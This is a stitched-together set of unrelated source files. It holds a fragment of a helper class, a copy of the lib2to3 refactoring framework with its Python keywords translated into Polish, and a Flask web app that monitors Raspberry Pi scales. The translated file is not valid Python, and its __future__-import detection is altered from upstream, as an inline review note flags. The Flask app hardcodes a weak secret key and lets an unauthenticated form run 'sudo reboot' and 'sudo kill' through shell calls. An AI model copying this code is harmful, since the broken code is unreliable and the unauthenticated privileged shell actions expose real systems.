return ret
def _get_property_combo(self, integer):
ret = set()
for property, idx in self.property_index_mapping.items():
if integer & (1 << idx):
ret.add(property)
return ret
|
refactor.py | # Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used jako a main program, this can refactor any number of files and/or
recursively descend down directories. Imported jako a module, this
provides infrastructure to write your own refactoring tool.
"""
z __future__ zaimportuj with_statement
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
zaimportuj os
zaimportuj sys
zaimportuj logging
zaimportuj operator
zaimportuj collections
zaimportuj io
z itertools zaimportuj chain
# Local imports
z .pgen2 zaimportuj driver, tokenize, token
z .fixer_util zaimportuj find_root
z . zaimportuj pytree, pygram
z . zaimportuj btm_utils jako bu
z . zaimportuj btm_matcher jako bm
def get_all_fix_names(fixer_pkg, remove_prefix=Prawda):
    """Return a sorted list of all available fix names in the given package."""
    # Import the fixer package and scan its directory for fix_*.py modules.
    pkg = __import__(fixer_pkg, [], [], ["*"])
    fixer_dir = os.path.dirname(pkg.__file__)
    fix_names = []
    dla name w sorted(os.listdir(fixer_dir)):
        jeżeli name.startswith("fix_") oraz name.endswith(".py"):
            jeżeli remove_prefix:
                # Drop the "fix_" prefix when requested.
                name = name[4:]
            # Strip the trailing ".py" extension.
            fix_names.append(name[:-3])
    zwróć fix_names
klasa _EveryNode(Exception):
    # Internal sentinel exception: raised when a pattern can start at any node type.
    dalej
def _get_head_types(pat):
    """ Accepts a pytree Pattern Node and returns a set
    of the pattern types which will match first. """
    jeżeli isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
        # NodePatterns must either have no type and no content
        # or a type and content -- so they don't get any farther
        # Always return leafs
        jeżeli pat.type jest Nic:
            podnieś _EveryNode
        zwróć {pat.type}

    jeżeli isinstance(pat, pytree.NegatedPattern):
        jeżeli pat.content:
            zwróć _get_head_types(pat.content)
        podnieś _EveryNode # Negated Patterns don't have a type

    jeżeli isinstance(pat, pytree.WildcardPattern):
        # Recurse on each node in content
        r = set()
        dla p w pat.content:
            dla x w p:
                r.update(_get_head_types(x))
        zwróć r

    podnieś Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
    """ Accepts a list of fixers and returns a dictionary
    of head node type --> fixer list.  """
    head_nodes = collections.defaultdict(list)
    # Fixers whose pattern can begin at any node type.
    every = []
    dla fixer w fixer_list:
        jeżeli fixer.pattern:
            spróbuj:
                heads = _get_head_types(fixer.pattern)
            wyjąwszy _EveryNode:
                every.append(fixer)
            inaczej:
                dla node_type w heads:
                    head_nodes[node_type].append(fixer)
        inaczej:
            jeżeli fixer._accept_type jest nie Nic:
                head_nodes[fixer._accept_type].append(fixer)
            inaczej:
                every.append(fixer)
    # Fixers that can match anywhere are registered under every node type.
    dla node_type w chain(pygram.python_grammar.symbol2number.values(),
                          pygram.python_grammar.tokens):
        head_nodes[node_type].extend(every)
    zwróć dict(head_nodes)
def get_fixers_from_package(pkg_name):
    """
    Return the fully qualified names for fixers in the package pkg_name.
    """
    zwróć [pkg_name + "." + fix_name
           dla fix_name w get_all_fix_names(pkg_name, Nieprawda)]
def _identity(obj):
    # Identity function; used as a no-op newline translator on Python 3.
    zwróć obj
jeżeli sys.version_info < (3, 0):
    # Python 2: codecs.open handles encodings but not universal newlines,
    # so explicit newline-translation helpers are needed.
    zaimportuj codecs
    _open_with_encoding = codecs.open
    # codecs.open doesn't translate newlines sadly.
    def _from_system_newlines(input):
        zwróć input.replace("\r\n", "\n")
    def _to_system_newlines(input):
        jeżeli os.linesep != "\n":
            zwróć input.replace("\n", os.linesep)
        inaczej:
            zwróć input
inaczej:
    # Python 3: builtin open handles encodings and newlines natively.
    _open_with_encoding = open
    _from_system_newlines = _identity
    _to_system_newlines = _identity
def _detect_future_features(source):
    """Return the frozenset of __future__ features imported at the top of source."""
    have_docstring = Nieprawda
    gen = tokenize.generate_tokens(io.StringIO(source).readline)
    def advance():
        tok = next(gen)
        zwróć tok[0], tok[1]
    # Token types that may legitimately appear before/between future imports.
    ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
    features = set()
    spróbuj:
        dopóki Prawda:
            tp, value = advance()
            jeżeli tp w ignore:
                kontynuuj
            albo_inaczej tp == token.STRING:
                jeżeli have_docstring:
                    przerwij
                have_docstring = Prawda
            albo_inaczej tp == token.NAME oraz value == "from":
                tp, value = advance()
                jeżeli tp != token.NAME albo value != "__future__":
                    przerwij
                tp, value = advance()
                jeżeli tp != token.NAME albo value != "import":
                    przerwij
                tp, value = advance()
                jeżeli tp == token.OP oraz value == "(":
                    # Parenthesized import list: collect comma-separated names.
                    # NOTE(review): an unparenthesized `from __future__ import x`
                    # is NOT collected by this branch, unlike upstream lib2to3
                    # where the name-collecting loop sits outside the paren
                    # check — confirm whether this divergence is intended.
                    tp, value = advance()
                    dopóki tp == token.NAME:
                        features.add(value)
                        tp, value = advance()
                        jeżeli tp != token.OP albo value != ",":
                            przerwij
                        tp, value = advance()
                inaczej:
                    przerwij
    wyjąwszy StopIteration:
        dalej
    zwróć frozenset(features)
klasa FixerError(Exception):
    """A fixer could not be loaded."""
klasa RefactoringTool(object):
    """Drives refactoring: loads the requested fixers and applies them to
    files, directories, strings, stdin and doctests."""

    # Defaults merged with caller-supplied options in __init__.
    _default_options = {"print_function" : Nieprawda,
                        "write_unchanged_files" : Nieprawda}

    CLASS_PREFIX = "Fix" # The prefix for fixer classes
    FILE_PREFIX = "fix_" # The prefix for modules with a fixer within

    def __init__(self, fixer_names, options=Nic, explicit=Nic):
        """Initializer.

        Args:
            fixer_names: a list of fixers to import
            options: a dict with configuration.
            explicit: a list of fixers to run even if they are explicit.
        """
        self.fixers = fixer_names
        self.explicit = explicit albo []
        self.options = self._default_options.copy()
        jeżeli options jest nie Nic:
            self.options.update(options)
        jeżeli self.options["print_function"]:
            self.grammar = pygram.python_grammar_no_print_statement
        inaczej:
            self.grammar = pygram.python_grammar
        # When this is True, the refactor*() methods will call write_file()
        # for files processed even if they were not changed during
        # refactoring — if and only if the refactor method's write
        # parameter was True.
        self.write_unchanged_files = self.options.get("write_unchanged_files")
        self.errors = []
        self.logger = logging.getLogger("RefactoringTool")
        self.fixer_log = []
        self.wrote = Nieprawda
        self.driver = driver.Driver(self.grammar,
                                    convert=pytree.convert,
                                    logger=self.logger)
        self.pre_order, self.post_order = self.get_fixers()

        self.files = []  # List of files that were or should be modified

        self.BM = bm.BottomMatcher()
        self.bmi_pre_order = []  # Bottom Matcher incompatible fixers
        self.bmi_post_order = []

        dla fixer w chain(self.post_order, self.pre_order):
            jeżeli fixer.BM_compatible:
                self.BM.add_fixer(fixer)
                # remove fixers that will be handled by the bottom-up
                # matcher
            albo_inaczej fixer w self.pre_order:
                self.bmi_pre_order.append(fixer)
            albo_inaczej fixer w self.post_order:
                self.bmi_post_order.append(fixer)

        self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
        self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)

    def get_fixers(self):
        """Inspects the options to load the requested patterns and handlers.

        Returns:
          (pre_order, post_order), where pre_order is the list of fixers that
          want a pre-order AST traversal, and post_order is the list that want
          post-order traversal.
        """
        pre_order_fixers = []
        post_order_fixers = []
        dla fix_mod_path w self.fixers:
            mod = __import__(fix_mod_path, {}, {}, ["*"])
            fix_name = fix_mod_path.rsplit(".", 1)[-1]
            jeżeli fix_name.startswith(self.FILE_PREFIX):
                fix_name = fix_name[len(self.FILE_PREFIX):]
            parts = fix_name.split("_")
            # fix_foo_bar -> FixFooBar naming convention.
            class_name = self.CLASS_PREFIX + "".join([p.title() dla p w parts])
            spróbuj:
                fix_class = getattr(mod, class_name)
            wyjąwszy AttributeError:
                podnieś FixerError("Can't find %s.%s" % (fix_name, class_name))
            fixer = fix_class(self.options, self.fixer_log)
            jeżeli fixer.explicit oraz self.explicit jest nie Prawda oraz \
                    fix_mod_path nie w self.explicit:
                self.log_message("Skipping optional fixer: %s", fix_name)
                kontynuuj

            self.log_debug("Adding transformation: %s", fix_name)
            jeżeli fixer.order == "pre":
                pre_order_fixers.append(fixer)
            albo_inaczej fixer.order == "post":
                post_order_fixers.append(fixer)
            inaczej:
                podnieś FixerError("Illegal fixer order: %r" % fixer.order)

        # Within each phase, fixers run in their declared run_order.
        key_func = operator.attrgetter("run_order")
        pre_order_fixers.sort(key=key_func)
        post_order_fixers.sort(key=key_func)
        zwróć (pre_order_fixers, post_order_fixers)

    def log_error(self, msg, *args, **kwds):
        """Called when an error occurs."""
        podnieś

    def log_message(self, msg, *args):
        """Hook to log a message."""
        jeżeli args:
            msg = msg % args
        self.logger.info(msg)

    def log_debug(self, msg, *args):
        # Lazy %-interpolation: only format when args were supplied.
        jeżeli args:
            msg = msg % args
        self.logger.debug(msg)

    def print_output(self, old_text, new_text, filename, equal):
        """Called with the old version, new version, and filename of a
        refactored file."""
        dalej

    def refactor(self, items, write=Nieprawda, doctests_only=Nieprawda):
        """Refactor a list of files and directories."""

        dla dir_or_file w items:
            jeżeli os.path.isdir(dir_or_file):
                self.refactor_dir(dir_or_file, write, doctests_only)
            inaczej:
                self.refactor_file(dir_or_file, write, doctests_only)

    def refactor_dir(self, dir_name, write=Nieprawda, doctests_only=Nieprawda):
        """Descends down a directory and refactor every Python file found.

        Python files are assumed to have a .py extension.

        Files and subdirectories starting with '.' are skipped.
        """
        py_ext = os.extsep + "py"
        dla dirpath, dirnames, filenames w os.walk(dir_name):
            self.log_debug("Descending into %s", dirpath)
            dirnames.sort()
            filenames.sort()
            dla name w filenames:
                jeżeli (nie name.startswith(".") oraz
                        os.path.splitext(name)[1] == py_ext):
                    fullname = os.path.join(dirpath, name)
                    self.refactor_file(fullname, write, doctests_only)
            # Modify dirnames in-place to remove subdirs with leading dots
            dirnames[:] = [dn dla dn w dirnames jeżeli nie dn.startswith(".")]

    def _read_python_source(self, filename):
        """
        Do our best to decode a Python source file correctly.
        """
        spróbuj:
            f = open(filename, "rb")
        wyjąwszy OSError jako err:
            self.log_error("Can't open %s: %s", filename, err)
            zwróć Nic, Nic
        spróbuj:
            # Honour PEP 263 coding cookies / BOMs before reopening as text.
            encoding = tokenize.detect_encoding(f.readline)[0]
        w_końcu:
            f.close()
        przy _open_with_encoding(filename, "r", encoding=encoding) jako f:
            zwróć _from_system_newlines(f.read()), encoding

    def refactor_file(self, filename, write=Nieprawda, doctests_only=Nieprawda):
        """Refactors a file."""
        input, encoding = self._read_python_source(filename)
        jeżeli input jest Nic:
            # Reading the file failed.
            zwróć
        input += "\n" # Silence certain parse errors
        jeżeli doctests_only:
            self.log_debug("Refactoring doctests w %s", filename)
            output = self.refactor_docstring(input, filename)
            jeżeli self.write_unchanged_files albo output != input:
                self.processed_file(output, filename, input, write, encoding)
            inaczej:
                self.log_debug("No doctest changes w %s", filename)
        inaczej:
            tree = self.refactor_string(input, filename)
            jeżeli self.write_unchanged_files albo (tree oraz tree.was_changed):
                # The [:-1] is to take off the \n we added earlier
                self.processed_file(str(tree)[:-1], filename,
                                    write=write, encoding=encoding)
            inaczej:
                self.log_debug("No changes w %s", filename)

    def refactor_string(self, data, name):
        """Refactor a given input string.

        Args:
            data: a string holding the code to be refactored.
            name: a human-readable name for use in error/log messages.

        Returns:
            An AST corresponding to the refactored input stream; None if
            there were errors during the parse.
        """
        features = _detect_future_features(data)
        jeżeli "print_function" w features:
            self.driver.grammar = pygram.python_grammar_no_print_statement
        spróbuj:
            tree = self.driver.parse_string(data)
        wyjąwszy Exception jako err:
            self.log_error("Can't parse %s: %s: %s",
                           name, err.__class__.__name__, err)
            zwróć
        w_końcu:
            # Always restore the configured grammar on the shared driver.
            self.driver.grammar = self.grammar
        tree.future_features = features
        self.log_debug("Refactoring %s", name)
        self.refactor_tree(tree, name)
        zwróć tree

    def refactor_stdin(self, doctests_only=Nieprawda):
        """Refactor source read from standard input; result goes to processed_file()."""
        input = sys.stdin.read()
        jeżeli doctests_only:
            self.log_debug("Refactoring doctests w stdin")
            output = self.refactor_docstring(input, "<stdin>")
            jeżeli self.write_unchanged_files albo output != input:
                self.processed_file(output, "<stdin>", input)
            inaczej:
                self.log_debug("No doctest changes w stdin")
        inaczej:
            tree = self.refactor_string(input, "<stdin>")
            jeżeli self.write_unchanged_files albo (tree oraz tree.was_changed):
                self.processed_file(str(tree), "<stdin>", input)
            inaczej:
                self.log_debug("No changes w stdin")

    def refactor_tree(self, tree, name):
        """Refactors a parse tree (modifying the tree in place).

        For compatible patterns the bottom matcher module is
        used. Otherwise the tree is traversed node-to-node for
        matches.

        Args:
            tree: a pytree.Node instance representing the root of the tree
                to be refactored.
            name: a human-readable name for this tree.

        Returns:
            True if the tree was modified, False otherwise.
        """

        dla fixer w chain(self.pre_order, self.post_order):
            fixer.start_tree(tree, name)

        # use traditional matching for the incompatible fixers
        self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
        self.traverse_by(self.bmi_post_order_heads, tree.post_order())

        # obtain a set of candidate nodes
        match_set = self.BM.run(tree.leaves())

        dopóki any(match_set.values()):
            dla fixer w self.BM.fixers:
                jeżeli fixer w match_set oraz match_set[fixer]:
                    # sort by depth; apply fixers from bottom(of the AST) to top
                    match_set[fixer].sort(key=pytree.Base.depth, reverse=Prawda)

                    jeżeli fixer.keep_line_order:
                        # some fixers(eg fix_imports) must be applied
                        # with the original file's line order
                        match_set[fixer].sort(key=pytree.Base.get_lineno)

                    dla node w list(match_set[fixer]):
                        jeżeli node w match_set[fixer]:
                            match_set[fixer].remove(node)

                        spróbuj:
                            find_root(node)
                        wyjąwszy ValueError:
                            # this node has been cut off from a
                            # previous transformation ; skip
                            kontynuuj

                        jeżeli node.fixers_applied oraz fixer w node.fixers_applied:
                            # do not apply the same fixer again
                            kontynuuj

                        results = fixer.match(node)

                        jeżeli results:
                            new = fixer.transform(node, results)
                            jeżeli new jest nie Nic:
                                node.replace(new)
                                # new.fixers_applied.append(fixer)
                                dla node w new.post_order():
                                    # do not apply the fixer again to
                                    # this or any subnode
                                    jeżeli nie node.fixers_applied:
                                        node.fixers_applied = []
                                    node.fixers_applied.append(fixer)

                                # update the original match set for
                                # the added code
                                new_matches = self.BM.run(new.leaves())
                                dla fxr w new_matches:
                                    jeżeli nie fxr w match_set:
                                        match_set[fxr]=[]
                                    match_set[fxr].extend(new_matches[fxr])

        dla fixer w chain(self.pre_order, self.post_order):
            fixer.finish_tree(tree, name)
        zwróć tree.was_changed

    def traverse_by(self, fixers, traversal):
        """Traverse an AST, applying a set of fixers to each node.

        This is a helper method for refactor_tree().

        Args:
            fixers: a list of fixer instances.
            traversal: a generator that yields AST nodes.

        Returns:
            None
        """
        jeżeli nie fixers:
            zwróć
        dla node w traversal:
            dla fixer w fixers[node.type]:
                results = fixer.match(node)
                jeżeli results:
                    new = fixer.transform(node, results)
                    jeżeli new jest nie Nic:
                        node.replace(new)
                        node = new

    def processed_file(self, new_text, filename, old_text=Nic, write=Nieprawda,
                       encoding=Nic):
        """
        Called when a file has been refactored and there may be changes.
        """
        self.files.append(filename)
        jeżeli old_text jest Nic:
            old_text = self._read_python_source(filename)[0]
            jeżeli old_text jest Nic:
                zwróć
        equal = old_text == new_text
        self.print_output(old_text, new_text, filename, equal)
        jeżeli equal:
            self.log_debug("No changes to %s", filename)
            jeżeli nie self.write_unchanged_files:
                zwróć
        jeżeli write:
            self.write_file(new_text, filename, old_text, encoding)
        inaczej:
            self.log_debug("Not writing changes to %s", filename)

    def write_file(self, new_text, filename, old_text, encoding=Nic):
        """Writes a string to a file.

        It first shows a unified diff between the old text and the new text, and
        then rewrites the file; the latter is only done if the write option is
        set.
        """
        spróbuj:
            f = _open_with_encoding(filename, "w", encoding=encoding)
        wyjąwszy OSError jako err:
            self.log_error("Can't create %s: %s", filename, err)
            zwróć
        spróbuj:
            f.write(_to_system_newlines(new_text))
        wyjąwszy OSError jako err:
            self.log_error("Can't write %s: %s", filename, err)
        w_końcu:
            f.close()
        self.log_debug("Wrote changes to %s", filename)
        self.wrote = Prawda

    # Doctest prompt strings recognised by refactor_docstring().
    PS1 = ">>> "
    PS2 = "... "

    def refactor_docstring(self, input, filename):
        """Refactors a docstring, looking for doctests.

        This returns a modified version of the input string.  It looks
        for doctests, which start with a ">>>" prompt, and may be
        continued with "..." prompts, as long as the "..." is indented
        the same as the ">>>".

        (Unfortunately we can't use the doctest module's parser,
        since, like most parsers, it is not geared towards preserving
        the original source.)
        """
        result = []
        block = Nic
        block_lineno = Nic
        indent = Nic
        lineno = 0
        dla line w input.splitlines(keepends=Prawda):
            lineno += 1
            jeżeli line.lstrip().startswith(self.PS1):
                jeżeli block jest nie Nic:
                    result.extend(self.refactor_doctest(block, block_lineno,
                                                        indent, filename))
                block_lineno = lineno
                block = [line]
                i = line.find(self.PS1)
                indent = line[:i]
            albo_inaczej (indent jest nie Nic oraz
                  (line.startswith(indent + self.PS2) albo
                   line == indent + self.PS2.rstrip() + "\n")):
                block.append(line)
            inaczej:
                jeżeli block jest nie Nic:
                    result.extend(self.refactor_doctest(block, block_lineno,
                                                        indent, filename))
                block = Nic
                indent = Nic
                result.append(line)
        jeżeli block jest nie Nic:
            result.extend(self.refactor_doctest(block, block_lineno,
                                                indent, filename))
        zwróć "".join(result)

    def refactor_doctest(self, block, lineno, indent, filename):
        """Refactors one doctest.

        A doctest is given as a block of lines, the first of which starts
        with ">>>" (possibly indented), while the remaining lines start
        with "..." (identically indented).
        """
        spróbuj:
            tree = self.parse_block(block, lineno, indent)
        wyjąwszy Exception jako err:
            jeżeli self.logger.isEnabledFor(logging.DEBUG):
                dla line w block:
                    self.log_debug("Source: %s", line.rstrip("\n"))
            self.log_error("Can't parse docstring w %s line %s: %s: %s",
                           filename, lineno, err.__class__.__name__, err)
            zwróć block
        jeżeli self.refactor_tree(tree, filename):
            new = str(tree).splitlines(keepends=Prawda)
            # Undo the adjustment of the line numbers in wrap_toks() below.
            clipped, new = new[:lineno-1], new[lineno-1:]
            assert clipped == ["\n"] * (lineno-1), clipped
            jeżeli nie new[-1].endswith("\n"):
                new[-1] += "\n"
            block = [indent + self.PS1 + new.pop(0)]
            jeżeli new:
                block += [indent + self.PS2 + line dla line w new]
        zwróć block

    def summarize(self):
        """Log a human-readable summary of the refactoring run."""
        jeżeli self.wrote:
            were = "were"
        inaczej:
            were = "need to be"
        jeżeli nie self.files:
            self.log_message("No files %s modified.", were)
        inaczej:
            self.log_message("Files that %s modified:", were)
            dla file w self.files:
                self.log_message(file)
        jeżeli self.fixer_log:
            self.log_message("Warnings/messages dopóki refactoring:")
            dla message w self.fixer_log:
                self.log_message(message)
        jeżeli self.errors:
            jeżeli len(self.errors) == 1:
                self.log_message("There was 1 error:")
            inaczej:
                self.log_message("There were %d errors:", len(self.errors))
            dla msg, args, kwds w self.errors:
                self.log_message(msg, *args, **kwds)

    def parse_block(self, block, lineno, indent):
        """Parses a block into a tree.

        This is necessary to get correct line number / offset information
        in the parser diagnostics and embedded into the parse tree.
        """
        tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
        tree.future_features = frozenset()
        zwróć tree

    def wrap_toks(self, block, lineno, indent):
        """Wraps a tokenize stream to systematically modify start/end."""
        tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
        dla type, value, (line0, col0), (line1, col1), line_text w tokens:
            line0 += lineno - 1
            line1 += lineno - 1
            # Don't bother updating the columns; this is too complicated
            # since line_text would also have to be updated and it would
            # still break for tokens spanning lines.  Let the user guess
            # that the column numbers for doctests are relative to the
            # end of the prompt string (PS1 or PS2).
            uzyskaj type, value, (line0, col0), (line1, col1), line_text

    def gen_lines(self, block, indent):
        """Generates lines as expected by tokenize from a list of lines.

        This strips the first len(indent + self.PS1) characters off each line.
        """
        prefix1 = indent + self.PS1
        prefix2 = indent + self.PS2
        prefix = prefix1
        dla line w block:
            jeżeli line.startswith(prefix):
                uzyskaj line[len(prefix):]
            albo_inaczej line == prefix.rstrip() + "\n":
                uzyskaj "\n"
            inaczej:
                podnieś AssertionError("line=%r, prefix=%r" % (line, prefix))
            # Only the first line carries PS1; continuations carry PS2.
            prefix = prefix2
        dopóki Prawda:
            uzyskaj ""
klasa MultiprocessingUnsupported(Exception):
    # Raised when the multiprocessing module cannot be imported.
    dalej
klasa MultiprocessRefactoringTool(RefactoringTool):
    """RefactoringTool that can fan file work out over worker processes.

    With num_processes == 1 it behaves exactly like the base class;
    otherwise file paths are enqueued onto a JoinableQueue consumed by
    child processes running _child().
    """

    def __init__(self, *args, **kwargs):
        super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
        # queue is Nic (None) in single-process mode; its presence signals
        # refactor_file() to enqueue instead of refactoring inline.
        self.queue = Nic
        self.output_lock = Nic

    def refactor(self, items, write=Nieprawda, doctests_only=Nieprawda,
                 num_processes=1):
        jeżeli num_processes == 1:
            zwróć super(MultiprocessRefactoringTool, self).refactor(
                items, write, doctests_only)
        spróbuj:
            zaimportuj multiprocessing
        wyjąwszy ImportError:
            podnieś MultiprocessingUnsupported
        jeżeli self.queue jest nie Nic:
            podnieś RuntimeError("already doing multiple processes")
        self.queue = multiprocessing.JoinableQueue()
        self.output_lock = multiprocessing.Lock()
        processes = [multiprocessing.Process(target=self._child)
                     dla i w range(num_processes)]
        spróbuj:
            dla p w processes:
                p.start()
            # The base-class refactor() enqueues files via refactor_file().
            super(MultiprocessRefactoringTool, self).refactor(items, write,
                                                              doctests_only)
        w_końcu:
            self.queue.join()
            # One Nic (None) sentinel per worker terminates its loop.
            dla i w range(num_processes):
                self.queue.put(Nic)
            dla p w processes:
                jeżeli p.is_alive():
                    p.join()
            self.queue = Nic

    def _child(self):
        # Worker loop: process queued (args, kwargs) tasks until the sentinel.
        task = self.queue.get()
        dopóki task jest nie Nic:
            args, kwargs = task
            spróbuj:
                super(MultiprocessRefactoringTool, self).refactor_file(
                    *args, **kwargs)
            w_końcu:
                self.queue.task_done()
            task = self.queue.get()

    def refactor_file(self, *args, **kwargs):
        # In multi-process mode enqueue the work; otherwise do it inline.
        jeżeli self.queue jest nie Nic:
            self.queue.put((args, kwargs))
        inaczej:
            zwróć super(MultiprocessRefactoringTool, self).refactor_file(
                *args, **kwargs)
|
FlaskMain.py | #!/usr/bin/python
import math
import threading
import os
import subprocess
import time
import datetime
import sys
import logging
from flask import Flask, render_template, redirect, url_for, request, send_from_directory, session
import BokehGraphCreator as GraphCreater
sys.path.append('../Tools/')
import ScaleInfoReaderWriter as ScaleIRW
import DatabaseReaderWriter as DBRW
import ConfigReaderWriter as CfgRW
exportDir = "../Exports"  # directory where CSV exports are written
logDir = "../Log"         # directory containing the application log
logFile = "Log.txt"       # log file name inside logDir
# Global database handle; assigned by LoadDB() just below the definitions.
ScaleDataDB = None
# Serializes database reconnect attempts across request threads.
reconnectLock = threading.Lock()
def LoadDB():
    """Create and connect a database profile for the configured backend.

    Only the Mongo profile is implemented; the non-"mongo" branch is a
    placeholder, so every configuration currently resolves to MongoDBProfile.
    """
    backend = CfgRW.cfgVars["dbToUse"]
    if backend == "mongo":
        db = DBRW.MongoDBProfile()
    else:
        # Placeholder until a MySQL profile exists.
        # db = DBRW.MySQLDBProfile()
        db = DBRW.MongoDBProfile()
    db.Connect()
    return db
def Reconnect():
    """Re-establish the database connection, at most one attempt at a time.

    Uses a non-blocking acquire so concurrent callers skip the reconnect
    instead of queueing behind it. The previous locked()/acquire() pair was
    racy (two threads could both pass the locked() check and then both
    block/reconnect) and leaked the lock if Reconnect() raised;
    acquire(False) plus try/finally fixes both problems.
    """
    if reconnectLock.acquire(False):
        try:
            ScaleDataDB.Reconnect()
        finally:
            reconnectLock.release()
# Connect to the configured database and create the Flask application.
ScaleDataDB = LoadDB()
app = Flask(__name__)
app.secret_key = "Not Random. Oh Noes"
# It doesn't matter because I'm not storing passwords or anything
@app.route('/')
def start():
    """Root route: send visitors to the home page."""
    home_url = url_for('home')
    return redirect(home_url)
@app.route('/Home', methods=['GET'])
def home():
    """Render the home page: one gauge per configured scale, laid out two per row."""
    didFail = "False"
    failMsg = "None"
    # Show (once) any failure message a previous request left in the session.
    if 'failMsg' in session:
        failMsg = session.pop('failMsg', None)
        didFail = "True"
    numOfScales = ScaleIRW.GetNumOfScales()
    js_resources, css_resources = GraphCreater.GetStaticResources()
    horizontalAlignments = list()
    # Scales are numbered from 1; process them pairwise for the two-gauge rows.
    for i in range(int(math.ceil(numOfScales/2.0))):
        scale1 = ScaleIRW.ScaleInfo(i*2+1)
        scale1.startGPIO()
        if i*2+1 < numOfScales:
            # A second scale exists for this row.
            scale2 = ScaleIRW.ScaleInfo(i*2+2)
            scale2.startGPIO()
            if CfgRW.cfgVars["uselatestFromMongoAsCurrent"].upper() == "TRUE":
                value1 = ScaleDataDB.GetLatestSample(scale1)
                value2 = ScaleDataDB.GetLatestSample(scale2)
            else:
                value1 = scale1.GetValue()
                value2 = scale2.GetValue()
            horizontalAlignments.append(GraphCreater.CombineFigs('h', GraphCreater.CreateGauge(value1, scale1),
                                                                 GraphCreater.CreateGauge(value2, scale2)))
        else:
            # Odd number of scales: the last row holds a single gauge.
            if CfgRW.cfgVars["uselatestFromMongoAsCurrent"].upper() == "TRUE":
                value1 = ScaleDataDB.GetLatestSample(scale1)
            else:
                value1 = scale1.GetValue()
            horizontalAlignments.append(GraphCreater.CreateGauge(value1, scale1))
        # NOTE(review): -1 presumably signals a failed database read; only
        # value1 (not value2) is checked, and with zero scales value1 would
        # be unbound. Original indentation was lost in this copy — confirm
        # the intended placement/level of this check.
        if value1 == -1:
            t = threading.Thread(target=Reconnect)
            t.start()
    script, div = GraphCreater.GetComponentsFromFig(GraphCreater.CombineFigs('v', horizontalAlignments))
    scaleAggregatorPID = GetPIDOfScaleAggregator()
    scaleAggregatorIsRunning = False
    try:
        if scaleAggregatorPID != None:
            # On Linux a live PID has an entry under /proc.
            scaleAggregatorIsRunning = os.path.exists("/proc/" + scaleAggregatorPID)
    except:
        scaleAggregatorIsRunning = False
    return render_template("HomePage.html", num=numOfScales, plot_script=script, plot_div=div, js_resources=js_resources, css_resources=css_resources,
                           scaleAggregatorIsRunning=scaleAggregatorIsRunning, didFail=didFail, failMsg=failMsg)
@app.route('/Home', methods=['POST'])
def homePost():
    """Handle the action buttons on the home page.

    Dispatches on the submit button's label. Every path now ends in a
    redirect or a file response; previously an unknown action (and the
    "Restart Pi" branch) fell through returning None, which Flask turns
    into an HTTP 500.
    """
    if request.form["submit"] == "Restart Pi":
        os.system('sudo reboot')
    if request.form["submit"] == "Start ScaleAggregator":
        os.system("(cd ../ScaleAggregator/; python ScaleAggregator.py &)")
        return redirect(url_for('home'))
    if request.form["submit"] == "Stop ScaleAggregator":
        try:
            PID = GetPIDOfScaleAggregator()
            os.system("sudo kill " + PID)
        except Exception:
            # PID may be None (aggregator not running); best-effort only.
            pass
        return redirect(url_for('home'))
    if request.form["submit"] == "Download Log File":
        try:
            return send_from_directory(logDir, logFile, as_attachment=True)
        except Exception as error:
            app.logger.error("An error occurred while trying to export the log. Exception: " + str(error))
            session['failMsg'] = "An error occurred while trying to export the log."
            return redirect(url_for('home'))
    if request.form["submit"] == "Delete Log File":
        # Handlers must release the file before it can be deleted.
        closeLoggerHandlers()
        try:
            DeleteLogFile()
        except Exception as error:
            app.logger.error("An error occurred while trying to delete the log. Exception: " + str(error))
            session['failMsg'] = "An error occurred while trying to delete the log file. Close all other programs that log to the log file and try again."
        app.logger.addHandler(createHandler())
        return redirect(url_for('home'))
    if request.form["submit"] == "Download Scale Info File":
        try:
            return send_from_directory("../", "ScaleInfoFile.SIF", as_attachment=True)
        except Exception as error:
            app.logger.error("An error occurred while trying to download the Scale Info File. Exception: " + str(error))
            session['failMsg'] = "An error occurred while trying to download the Scale Info File."
            return redirect(url_for('home'))
    # Fallback for unknown actions (and after the reboot command is issued).
    return redirect(url_for('home'))
def GetPIDOfScaleAggregator():
    """Return the PID (as a string) of a running ScaleAggregator.py, or None.

    Greps the process table via the shell. Fixes two defects: on Python 3
    check_output returns bytes, so the old str split raised a TypeError that
    the bare except silently turned into a permanent None; and split(' ')
    yields empty strings when ps right-aligns the PID column, whereas
    split() tolerates the padding.
    """
    try:
        output = subprocess.check_output("ps ax | grep ScaleAggregator.py", shell=True)
        if not isinstance(output, str):
            # Python 3: decode the bytes output before string processing.
            output = output.decode("utf-8", "replace")
        output = output.strip()
        # First whitespace-separated token of the first matching line is the PID
        # (the grep process itself also matches, mirroring the original behaviour).
        PID = output.split()[0]
        return PID
    except Exception:
        return None
def CreateScaleGraphFromTimeFrame(num, hours=730):
    """Build the scale-detail page: a current-value gauge plus a history plot.

    Args:
        num: 1-based scale number.
        hours: history window size in hours (730 marks the default view).

    Returns:
        UTF-8 encoded HTML rendered from the ScaleInfo template.
    """
    ki = ScaleIRW.ScaleInfo(num)
    didFail = "False"
    failMsg = "None"
    # Show (once) any failure message a previous request left in the session.
    if 'failMsg' in session:
        failMsg = session.pop('failMsg', None)
        didFail = "True"
    if not ki.Failed:
        ki.startGPIO()
        if CfgRW.cfgVars["uselatestFromMongoAsCurrent"].upper() == "TRUE":
            value = ScaleDataDB.GetLatestSample(ki)
        else:
            value = ki.GetValue()
    else:
        # Scale info failed to load: render a zeroed gauge with an error note.
        if failMsg == "None":
            failMsg = "An error occurred while loading scale info."
        value = 0
        didFail = "True"
    totalScales = ScaleIRW.GetNumOfScales()
    # Get the data
    dbNotWorking = False
    try:
        if ScaleDataDB.Connected == True:
            timeFrameData = ScaleDataDB.GetTimeFrameFor(ki, hours)
        else:
            raise Exception('GetTimeFrameFor failed')
    except:
        # Fall back to an empty plot and attempt a reconnect in the background.
        dbNotWorking = True
        ScaleDataDB.Connected = False
